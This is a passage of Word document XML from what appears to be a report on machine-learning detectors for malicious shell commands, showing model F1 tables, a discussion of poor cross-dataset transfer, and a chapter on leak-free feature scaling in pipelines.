          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>random_forest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.796</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.515</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.753</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.143</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>xgboost</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.786</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.495</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.756</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.235</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>isolation_forest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.249</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.148</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.143</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.241</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">(F1; full metrics in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>results/ch8_cross_dataset.json</w:t>
      </w:r>
      <w:r>
        <w:t>, analysed in Chapter 8.2.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Transfer is poor and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>asymmetric</w:t>
      </w:r>
      <w:r>
        <w:t>. The best D1→D2 result clears the floor but</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>reaches only 0.541, against 0.848 for a model trained on Dataset 2 itself. In</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">the other direction the best result is 0.359 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>below</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the do-nothing floor, as</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>every one of the five models</w:t>
      </w:r>
      <w:r>
        <w:t>, meaning a detector trained on real honeypot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>activity and pointed at published attack payloads is worse than useless in the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>strict sense that labelling everything "attack" would score higher. Dataset 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>generalises to Dataset 2 slightly better than the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>reverse, which is what the shift analysis predicts: Dataset 1 is the broader,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>more heterogeneous corpus, while a model trained only on honeypot activity has</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>never seen a published multi-stage payload.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>No domain adaptation, importance reweighting or per-corpus feature was</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>introduced to close this gap. That is deliberate. The gap is the result the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>two-dataset design exists to produce, and the analysis above is an explanation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>of it rather than an apology for it — a detector validated on one corpus of</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>shell commands should not be assumed to work on another, and this chapter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>quantifies how badly that assumption fails.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 5.3 — Feature Scaling and Normalisation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Sources: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>src/models.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>src/preprocessing.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>scripts/build_dataset.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>report/ch6_rf_if_justification.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> §6.4.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>The rule: every fitted transform lives inside the pipeline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The assignment requires that any sampling or scaling be fit strictly on the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>training fold. This project satisfies that structurally rather than by</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">discipline: no </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>fitted</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> transform is ever applied to a dataframe and then split.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Each</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">model is an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>imblearn</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Pipeline</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> whose first stages are the transforms —</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>ImbPipeline([("features", EngineeredFeatures()),</w:t>
        <w:br/>
        <w:t xml:space="preserve">             ("scale",    StandardScaler()),</w:t>
        <w:br/>
        <w:t xml:space="preserve">             ("clf",      clf)])</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">— so </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>StandardScaler</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> learns its 43 means and standard deviations from whatever</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">rows the pipeline is handed. Under </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>StratifiedKFold</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cross-validation that is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>the training fold of each split, refitted once per fold; under holdout</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>evaluation it is the training split alone. The test rows are never seen by</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>fit</w:t>
      </w:r>
      <w:r>
        <w:t>. The same</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>property covers the two learned representations in the project that genuinely</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>could leak. The char n-gram TF-IDF vocabulary (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CharNgramFeatures</w:t>
      </w:r>
      <w:r>
        <w:t>) is a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FeatureUnion</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> stage inside the hybrid pipeline; the CNN's character index table</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CharSequenceEncoder</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) is fitted inside </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CNN1DClassifier.fit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> itself</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>src/models.py:276</w:t>
      </w:r>
      <w:r>
        <w:t>), as is the Isolation Forest's internal transform pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Different mechanics, one guarantee: a vocabulary is only ever built from rows the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>model is allowed to see.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Why a scaler is the default, and where it is actually used</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The 43 engineered features are on wildly incompatible scales by construction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Measured on Dataset 1's training split, per-feature standard deviation runs from</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>0.0157 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_ifs_expansion</w:t>
      </w:r>
      <w:r>
        <w:t>, a flag firing on a fraction of a percent of rows) to</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>34.2 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>len_chars</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — a spread of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>2,182×</w:t>
      </w:r>
      <w:r>
        <w:t>, and observed value ranges from well</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>under 1 (the density ratios) to 546 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>len_chars</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>For any learner whose objective depends on Euclidean distance or on gradient</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>magnitude, that disparity alone would decide the model.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The scaler is not applied uniformly, and the exceptions are deliberate:</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pipeline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>scaler</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>why</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>xgboost</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (engineered)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>StandardScaler</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>uniform contract</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>random_forest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>StandardScaler</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>uniform contract</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>isolation_forest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>StandardScaler</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
